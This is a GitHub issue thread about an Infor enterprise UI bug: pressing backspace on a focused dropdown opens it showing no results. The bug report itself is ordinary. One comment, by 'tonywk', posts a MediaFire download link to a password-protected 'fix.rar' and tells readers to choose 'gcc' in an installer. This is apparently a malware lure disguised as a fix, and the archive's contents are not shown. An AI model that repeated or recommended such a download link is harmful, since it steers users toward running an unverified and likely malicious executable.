### ISSUE TITLE
Dropdown: Hitting a backspace when focused on a dropdown returns no results

### ISSUE THREAD

**Issue by Sovia** [infor-design/enterprise#8985]
**Describe the bug**
When a dropdown is focused, and the backspace button is pressed, the dropdown opens with no search results found even though no filter string is entered.

**To Reproduce**

1. Go to https://main-enterprise.demo.design.infor.com/components/dropdown/example-index.html
2. Tab so that the dropdown is focused
3. Press backspace

**Expected behavior**
If there is no search string, then all the values should be returned.

**Version**

- ids-enterprise: 4.99.0-dev

**Screenshots**
![StaticDropdownSearchIssueForm](https://github.com/user-attachments/assets/e9a7f9f9-8cea-452e-be10-70c64ef95952)
![StaticDropdownSearchIssue](https://github.com/user-attachments/assets/988ad9e4-c4be-4556-b5d7-bd5c304f75a8)

**Platform**
 - Infor Application/Team Name: Landmark Web UI
 - OS Version: Windows 11
 - Browser Name: Chrome
 - Browser Version: 127.0.6533.122

**Additional context**
This also happens on a datagrid.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AAlviar** [comment]
jira: https://inforwiki.atlassian.net/browse/IDS-4030
